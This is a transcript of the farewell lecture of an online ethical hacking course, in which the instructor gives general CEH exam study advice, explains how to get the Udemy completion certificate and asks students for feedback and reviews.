Welcome to the last lecture of this course. This is basically not a last lecture because I will keep on updating this course with new videos with the time. But anyhow, I have made this last lecture. If you felt I have left something important concept in this course, then please do message me. I will make a video on those topics and upload it. And if you think any of the video is not properly made, or some video editing problem or voice problem, or you are not unable to understand those concepts, then let me know that also. I will simplify it for you. Just let me know what more you want from this course. I will add those videos in this course. From my side, I have added what I think are necessary, and I will keep on adding more concept with the time. Regarding CH or certification exam related to ethical hacking, what I would like to say is, every year new questions are introduced in CH exams, or sometimes the old questions are reintroduced, and those questions are mainly based on practical things what you do in ethical hacking. So that's why I have covered the practical part of ethical hacking in this video. How much you read and learn on ethical hacking is less, because every day new technology is introduced, new tool is introduced, new acronym is introduced. So just keep on reading and studying the various articles and various video tutorials. Just don't depend on my course. This course was meant for basics. Do study various question papers available online, and please do check out EC Council website and other certification related website where you'll get different question paper sets. Just practice with those question papers and try to read as much more possible every day on ethical hacking concepts. So there are various certification courses out there. If you want to try them also, you can go and try them. You'll get to learn something new if the instructor has covered some new topics, else you will get to see the same topics which I have covered in this course. And regarding the Udemy certificate, the certificate will be emailed to you after you complete the 100% of the course, or else in Udemy dashboard you will see the logo of trophy beside the review. If you click on that trophy, you can download the certificate. The certificate provided by the Udemy is completion certificate. Let me know what more doubts you have in Q&A section and what kind of suggestions you want to give me so that I improve on my content of the videos and how much I should simplify my videos so that all students should understand it. I have already published more than 24 courses. If you want me to make any new course on particular topic, let me know. Just message me or write in Q&A section. I'll just think over it, as almost all of my courses which I have made are made on the suggestion given by the students. and the content is also suggested by the students. And at the last, please do leave a review with the rating, and please do write what you felt good about the course. If you had any bad experience in a particular topic in my course, then please do message me. I will correct it as soon as it's possible. If you have any questions related to ethical hacking topics, just message me. I will clarify it one-to-one as soon as it's possible. So that's it. Best of luck with your ethical hacking career. I hope you succeed in ethical hacking like all my students. Thank you for giving your valuable time for watching my course. Thank you.